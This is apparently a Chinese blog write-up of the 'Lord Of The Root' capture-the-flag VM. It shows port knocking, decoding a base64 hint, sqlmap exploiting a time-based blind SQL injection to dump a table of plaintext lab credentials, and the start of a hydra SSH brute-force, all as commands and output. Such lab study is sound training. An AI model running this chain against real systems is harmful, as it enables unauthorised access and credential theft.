【靶场实例】6-Lord Of The Root-1.0.1
2023-6-11 00:0:30 Author: 白帽子(查看原文) 阅读量:11 收藏

主机探测

虚拟机的 NAT ,主机比较少,比较好分辨

──# nmap -sP 192.168.116.0/24  
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-12 22:40 CST
Nmap scan report for 192.168.116.1
Host is up (0.00016s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.116.2
Host is up (0.00018s latency).
MAC Address: 00:50:56:E7:AD:8A (VMware)
Nmap scan report for 192.168.116.196
Host is up (0.000097s latency).
MAC Address: 00:0C:29:B8:FA:E3 (VMware)
Nmap scan report for 192.168.116.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:F0:C3:61 (VMware)
Nmap scan report for 192.168.116.164
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 12.98 seconds

端口扫描

这里只开启了一个端口 22,突然间麻木了,我都在思考,是不是爆破,当然 22 端口也是有封控行为的,累计错误多次,ssh 会被拒绝连接,这个感觉也是有点不切实际

└─# nmap -sVC -T5 -Pn -p- -O -open --min-rate 5000 192.168.116.196    

Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-12 22:41 CST
Nmap scan report for 192.168.116.196
Host is up (0.00036s latency).
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
| 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
MAC Address: 00:0C:29:B8:FA:E3 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.96 seconds


尝试突破

这里也只能大概的尝试一下是否可以正常的连接,毕竟连他的用户名都没有,只能使用默认的 root

└─# ssh 192.168.116.196              
The authenticity of host '192.168.116.196 (192.168.116.196)' can't be established.
ED25519 key fingerprint is SHA256:Rz24fg01xp2jMdwk9c44ijnZAz1uaUlvRXX7QU+ERtI.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.116.196' (ED25519) to the list of known hosts.

.____ _____________________________
| | \_____ \__ ___/\______ \
| | / | \| | | _/
| |___/ | \ | | | \
|_______ \_______ /____| |____|_ /
\/ \/ \/
____ __. __ ___________ .__ .___ ___________ ___________ __
| |/ _| ____ ____ ____ | | __ \_ _____/______|__| ____ ____ __| _/ \__ ___/___ \_ _____/ _____/ |_ ___________
| < / \ / _ \_/ ___\| |/ / | __) \_ __ \ |/ __ \ / \ / __ | | | / _ \ | __)_ / \ __\/ __ \_ __ \
| | \| | ( <_> ) \___| < | \ | | \/ \ ___/| | \/ /_/ | | |( <_> ) | \ | \ | \ ___/| | \/
|____|__ \___| /\____/ \___ >__|_ \ \___ / |__| |__|\___ >___| /\____ | |____| \____/ /_______ /___| /__| \___ >__|
\/ \/ \/ \/ \/ \/ \/ \/ \/ \/ \/
Easy as 1,2,3
[email protected]'s password:

这里登录以后提示一串字符我没有看懂,除了这段话Easy as 1,2,3,我直接麻痹,收集了一下相关资料才发现这个是一个新的东西


端口试探

端口试探(port knocking)是一种通过连接尝试,从外部打开原先关闭端口的方法。一旦收到正确顺序的连接尝试,防火墙就会动态打开一些特定的端口给允许尝试连接的主机

端口试探的主要目的是防治攻击者通过端口扫描的方式对主机进行攻击。端口试探类似于一次秘密握手协议,比如一种最基本的方式:发送一定序列的UDP、TCP数据包。当运行在主机上的daemon程序捕捉到数据包以后,如果这个序列正确,则开启相应的端口,或者防火墙允许客户端通过

由于对外的Linux服务器通过限制IP地址的方式来控制访问,因此可以利用这种端口试探方式来进行防火墙对于访问IP地址的控制

linux - 芝麻开门 Port-knocking_个人文章 - SegmentFault 思否.pdf


Easy as 1,2,3,这个提示我们只能认为他让我们碰撞 3 次(1、2、3)端口,这里有几种碰撞的方式

NC

for port in $(seq 1 3 ) ; do nmap 192.168.116.196 -p $port & done
└─# for port in $(seq 1 3 ) ; do nmap 192.168.116.196 -p $port & done
[2] 97590
[3] 97591
[4] 97592

这里就出现了一个新的 1337 端口

└─# nmap1 192.168.116.196                                            
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-13 17:42 CST
Nmap scan report for 192.168.116.196
Host is up (0.00045s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
| 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:B8:FA:E3 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.05 seconds


knock

sudo apt install knockd
  • knock <IP> <PORT1> <PORT2> <PORT3> <PORT4> -v

└─# knock 192.168.116.196 1 2 3  -v
hitting tcp 192.168.116.196:1
hitting tcp 192.168.116.196:2
hitting tcp 192.168.116.196:3
└─# nmap1 192.168.116.196          
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-13 17:49 CST
Nmap scan report for 192.168.116.196
Host is up (0.00035s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
| 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:B8:FA:E3 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.09 seconds


hping3

  • -S(--syn):SYN是TCP/IP建立连接时使用的握手信号。在客户机和服务器之间建立正常的TCP网络连接时,客户机首先发出一个SYN消息,服务器使用SYN-ACK应答表示接收到了这个消息,最后客户机再以ACK消息响应。这样在客户机和服务器之间才能建立起可靠的TCP连接,数据才可以在客户机和服务器之间传递。

  • -p --destport: 目的端口(默认为0),可同时指定多个端口

  • -c --count:指定数据包的次数

hping3 -S [IP地址] -p 1 -c 1
└─# hping3 -S 192.168.116.196 -p 1 -c 1
HPING 192.168.116.196 (eth0 192.168.116.196): S set, 40 headers + 0 data bytes

--- 192.168.116.196 hping statistic ---
1 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

┌──(root㉿Tom)-[~/桌面]
└─# hping3 -S 192.168.116.196 -p 2 -c 1
HPING 192.168.116.196 (eth0 192.168.116.196): S set, 40 headers + 0 data bytes

--- 192.168.116.196 hping statistic ---
1 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

┌──(root㉿Tom)-[~/桌面]
└─# hping3 -S 192.168.116.196 -p 3 -c 1
HPING 192.168.116.196 (eth0 192.168.116.196): S set, 40 headers + 0 data bytes

--- 192.168.116.196 hping statistic ---
1 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

for port in $(seq 1 3 ); do hping3 -S 192.168.116.196 -p $port -c 1 & done


网页测试

路径

这里好像也没有扫出什么

└─# dirb http://192.168.116.196:1337/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Nov 13 17:58:11 2022
URL_BASE: http://192.168.116.196:1337/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.116.196:1337/ ----
==> DIRECTORY: http://192.168.116.196:1337/images/
+ http://192.168.116.196:1337/index.html (CODE:200|SIZE:64)
+ http://192.168.116.196:1337/server-status (CODE:403|SIZE:297)

---- Entering directory: http://192.168.116.196:1337/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Nov 13 17:58:16 2022
DOWNLOADED: 4612 - FOUND: 2

那么就查看一下 robots这里有没有提示,这下面有一个 base64 的编码,当然我们可以先去识别一下

<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>

这里没有识别出来,直接 base64 解密,然后识别出来是个嵌套加密,继续进行解密,然后出来一个 URL 路径

┌──(root㉿Tom)-[~/桌面]
└─# hash-identifier THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# [email protected] #
#########################################################################
--------------------------------------------------

Possible Hashs:
[+] Tiger-192
[+] Haval-192

Least Possible Hashs:
[+] Tiger-192(HMAC)
[+] Haval-192(HMAC)
--------------------------------------------------
HASH: ^C

Bye!

┌──(root㉿Tom)-[~/桌面]
└─# echo 'THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh' | base64 -d
Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!
┌──(root㉿Tom)-[~/桌面]
└─# echo 'Lzk3ODM0NTIxMC9pbmRleC5waHA=' | base64 -d
/978345210/index.php


注入

看到这种,只有注入和暴力破解(没有任何的提示,纯纯 fuzz),其他 web 漏洞好像没有突破点,对于技术菜的人就是兔子洞

这里跟师傅学习了一下 sqlmap 的其他玩法

sqlmap -o -u "http://192.168.116.196:1337/978345210/index.php" --forms --batch
  • Optimization(自动注入)

    • -o:开启所有优化开关

    • --predict-output:预测常见的查询输出

    • --keep-alive:使用持久的HTTP(S)连接

    • --null-connection:从没有实际的HTTP响应体中检索页面长度

  • --threads=THREADS:设置请求的并发数

  • --forms参数,sqlmap会自动从-u中的url获取页面中的表单进行测试

└─# sqlmap -o -u "http://192.168.116.196:1337/978345210/index.php" --forms --batch
___
__H__
___ ___[']_____ ___ ___ {1.6.4#stable}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:12:23 /2022-11-13/

[18:12:23] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=9e9m2i8ms1o...c2pk8sr9i4'). Do you want to use those [Y/n] Y
[18:12:23] [INFO] searching for forms
[1/1] Form:
POST http://192.168.116.196:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): username=&password=&submit= Login
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[18:12:24] [INFO] using '/root/.local/share/sqlmap/output/results-11132022_0612pm.csv' as the CSV results file in multiple targets mode
[18:12:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:12:24] [INFO] testing if the target URL content is stable
[18:12:24] [INFO] target URL content is stable
[18:12:24] [INFO] testing if POST parameter 'username' is dynamic
[18:12:24] [WARNING] POST parameter 'username' does not appear to be dynamic
[18:12:24] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[18:12:24] [INFO] testing for SQL injection on POST parameter 'username'
[18:12:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:12:24] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:12:24] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:12:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:12:24] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[18:12:24] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:12:24] [INFO] testing 'Generic inline queries'
[18:12:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:12:24] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:12:24] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:12:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:12:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:12:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[18:12:24] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[18:12:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:12:25] [WARNING] POST parameter 'username' does not seem to be injectable
[18:12:25] [INFO] testing if POST parameter 'password' is dynamic
[18:12:25] [WARNING] POST parameter 'password' does not appear to be dynamic
[18:12:25] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[18:12:25] [INFO] testing for SQL injection on POST parameter 'password'
[18:12:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:12:25] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:12:25] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:12:25] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:12:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[18:12:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:12:25] [INFO] testing 'Generic inline queries'
[18:12:25] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:12:25] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:12:25] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:12:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:12:35] [INFO] POST parameter 'password' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[18:12:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:12:35] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:12:35] [INFO] checking if the injection point on POST parameter 'password' is a false positive
POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 126 HTTP(s) requests:
---
Parameter: password (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=gorg&password=' AND (SELECT 3792 FROM (SELECT(SLEEP(5)))oZLa) AND 'ksOe'='ksOe&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[18:12:50] [INFO] the back-end DBMS is MySQL
[18:12:50] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[18:12:50] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-11132022_0612pm.csv'
[18:12:50] [WARNING] your sqlmap version is outdated

[*] ending @ 18:12:50 /2022-11-13/

检测出有注入点剩下的就好办了,梭哈就完事

sqlmap -o -u "http://192.168.116.196:1337/978345210/index.php" --forms -D Webapp --tables --batch

出表

└─# sqlmap -o -u "http://192.168.116.196:1337/978345210/index.php" --forms -D Webapp --tables --batch
___
__H__
___ ___[,]_____ ___ ___ {1.6.4#stable}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:00:53 /2022-11-13/

[22:00:53] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=v4hcu00gj4d...k60g84vbn7'). Do you want to use those [Y/n] Y
[22:00:53] [INFO] searching for forms
[1/1] Form:
POST http://192.168.116.196:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): username=&password=&submit= Login
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[22:00:53] [INFO] resuming back-end DBMS 'mysql'
[22:00:53] [INFO] using '/root/.local/share/sqlmap/output/results-11132022_1000pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=gorg&password=' AND (SELECT 3792 FROM (SELECT(SLEEP(5)))oZLa) AND 'ksOe'='ksOe&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[22:00:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[22:00:53] [INFO] fetching tables for database: 'Webapp'
[22:00:53] [INFO] fetching number of tables for database 'Webapp'
[22:00:53] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[22:00:53] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
[22:00:58] [INFO] retrieved:
[22:01:08] [INFO] adjusting time delay to 1 second due to good response times
Users
Database: Webapp
[1 table]
+-------+
| Users |
+-------+

[22:01:21] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-11132022_1000pm.csv'
[22:01:21] [WARNING] your sqlmap version is outdated

[*] ending @ 22:01:21 /2022-11-13/

出列名

sqlmap -o -u "http://192.168.116.196:1337/978345210/index.php" --forms -D Webapp -T Users --columns --batch
└─# sqlmap -o -u "http://192.168.116.196:1337/978345210/index.php" --forms -D Webapp -T Users --columns --batch
___
__H__
___ ___["]_____ ___ ___ {1.6.4#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:07:08 /2022-11-13/

[22:07:08] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=dfoq1ga9bah...9s0up02g06'). Do you want to use those [Y/n] Y
[22:07:08] [INFO] searching for forms
[1/1] Form:
POST http://192.168.116.196:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): username=&password=&submit= Login
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[22:07:08] [INFO] resuming back-end DBMS 'mysql'
[22:07:08] [INFO] using '/root/.local/share/sqlmap/output/results-11132022_1007pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=gorg&password=' AND (SELECT 3792 FROM (SELECT(SLEEP(5)))oZLa) AND 'ksOe'='ksOe&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[22:07:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[22:07:08] [INFO] fetching columns for table 'Users' in database 'Webapp'
[22:07:08] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[22:07:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[22:07:23] [INFO] adjusting time delay to 1 second due to good response times
3
[22:07:23] [INFO] retrieved: id
[22:07:30] [INFO] retrieved: int(10)
[22:07:54] [INFO] retrieved: username
[22:08:16] [INFO] retrieved: varchar(255)
[22:08:53] [INFO] retrieved: password
[22:09:20] [INFO] retrieved: varchar(255)
Database: Webapp
Table: Users
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(10) |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+

[22:09:56] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-11132022_1007pm.csv'
[22:09:56] [WARNING] your sqlmap version is outdated

[*] ending @ 22:09:56 /2022-11-13/

出数据,这里我脱裤了--dump-all就是保存到文件

sqlmap -o -u "http://192.168.116.196:1337/978345210/index.php" --forms -D Webapp -T Users --columns -C id,username,password --dump-all --batch
└─# sqlmap -o -u "http://192.168.116.196:1337/978345210/index.php" --forms -D Webapp -T Users --columns -C id,username,password --dump-all --batch
___
__H__
___ ___[(]_____ ___ ___ {1.6.4#stable}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:16:59 /2022-11-13/

[22:16:59] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=puu8r112ftn...2e5lqhv9g0'). Do you want to use those [Y/n] Y
[22:16:59] [INFO] searching for forms
[1/1] Form:
POST http://192.168.116.196:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): username=&password=&submit= Login
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[22:17:00] [INFO] resuming back-end DBMS 'mysql'
[22:17:00] [INFO] using '/root/.local/share/sqlmap/output/results-11132022_1017pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=gorg&password=' AND (SELECT 3792 FROM (SELECT(SLEEP(5)))oZLa) AND 'ksOe'='ksOe&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[22:17:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[22:17:00] [INFO] fetching columns 'id, password, username' for table 'Users' in database 'Webapp'
[22:17:00] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[22:17:00] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[22:17:15] [INFO] adjusting time delay to 1 second due to good response times
3
[22:17:15] [INFO] retrieved: id
[22:17:21] [INFO] resumed: int(10)
[22:17:21] [INFO] retrieved: username
[22:17:43] [INFO] resumed: varchar(255)
[22:17:43] [INFO] retrieved: password
[22:18:11] [INFO] resumed: varchar(255)
Database: Webapp
Table: Users
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(10) |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+

[22:18:11] [INFO] sqlmap will dump entries of all tables from all databases now
[22:18:11] [INFO] fetching tables for database: 'Webapp'
[22:18:11] [INFO] fetching number of tables for database 'Webapp'
[22:18:11] [INFO] resumed: 1
[22:18:11] [INFO] resumed: Users
[22:18:11] [INFO] fetching columns for table 'Users' in database 'Webapp'
[22:18:11] [INFO] resumed: 3
[22:18:11] [INFO] resumed: id
[22:18:11] [INFO] resumed: username
[22:18:11] [INFO] resumed: password
[22:18:11] [INFO] fetching entries for table 'Users' in database 'Webapp'
[22:18:11] [INFO] fetching number of entries for table 'Users' in database 'Webapp'
[22:18:11] [INFO] retrieved: 5
[22:18:13] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
1
[22:18:15] [INFO] retrieved: iwilltakethering
[22:19:04] [INFO] retrieved: frodo
[22:19:23] [INFO] retrieved: 2
[22:19:26] [INFO] retrieved: MyPreciousR00t
[22:20:13] [INFO] retrieved: smeagol
[22:20:34] [INFO] retrieved: 3
[22:20:37] [INFO] retrieved: AndMySword
[22:21:15] [INFO] retrieved: aragorn
[22:21:35] [INFO] retrieved: 4
[22:21:39] [INFO] retrieved: AndMyBow
[22:22:10] [INFO] retrieved: legolas
[22:22:33] [INFO] retrieved: 5
[22:22:36] [INFO] retrieved: AndMyAxe
[22:23:05] [INFO] retrieved: gimli
Database: Webapp
Table: Users
[5 entries]
+----+------------------+----------+
| id | password | username |
+----+------------------+----------+
| 1 | iwilltakethering | frodo |
| 2 | MyPreciousR00t | smeagol |
| 3 | AndMySword | aragorn |
| 4 | AndMyBow | legolas |
| 5 | AndMyAxe | gimli |
+----+------------------+----------+

[22:23:20] [INFO] table 'Webapp.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.116.196/dump/Webapp/Users.csv'
[22:23:20] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-11132022_1017pm.csv'
[22:23:20] [WARNING] your sqlmap version is outdated


SSH

这里出的数据,一看就是用户,不是登录就是SSH,这里我跑 SSH

hydra

注意末尾换行

└─# hydra -L u.txt -P p.txt 192.168.116.196 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-13 22:44:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
